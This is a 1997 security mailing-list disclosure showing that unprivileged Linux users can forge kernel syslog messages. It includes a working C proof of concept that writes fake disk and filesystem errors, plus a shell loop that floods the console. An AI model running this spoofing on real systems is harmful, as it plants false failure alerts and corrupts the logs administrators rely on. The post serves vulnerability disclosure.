[1454] in linux-security and linux-alert archive
[linux-security] Abuse of the syslog facility
daemon@ATHENA.MIT.EDU (Paul Gortmaker)
Wed Feb 19 13:45:46 1997
From: Paul Gortmaker <gpg109@rsphy6.anu.edu.au>
To: linux-security@redhat.com
Date: Wed, 19 Feb 1997 18:42:46 +1100 (EST)
Resent-From: linux-security@redhat.com
Reply-To: linux-security@redhat.com
Any unpriveledged user can abuse the syslog facility in an interesting
way. The following example is a good one that can put misleading
information in the logs.
-------------------------------
#include <syslog.h>
void main(void){
const char *mesg1 = "hda: read_intr: status=0x59 { SeekComplete
DataRequest Error } { UncorrectableError }, CHS=157/2/9, sector=2826\0";
const char *mesg2 ="end_request: I/O error, dev 03:00, sector 2826\0";
const char *mesg3 = "EXT2-fs: group descriptors corrupted !\0";
openlog("kernel", LOG_CONS, LOG_KERN);
syslog(LOG_ERR, mesg1);
syslog(LOG_ERR, mesg2);
syslog(LOG_ERR, mesg3);
closelog();
}
---------------------------------
If one does "chmod o-rw /dev/log" that stops the above message from ending
up in the log. However if the user runs the above in a tight loop,
i.e. "while true; do fake_message;done" then syslogd apparently can't
keep up and by definition of LOG_CONS (man 3 syslog) one has:
LOG_CONS
write directly to system console if there is an
error while sending to system logger
and hence the console gets *flooded* with fake messages. This was with
RH v4.1 but I suspect general applicability.
Not a deadly security threat, but I thought I'd mention it.
Paul.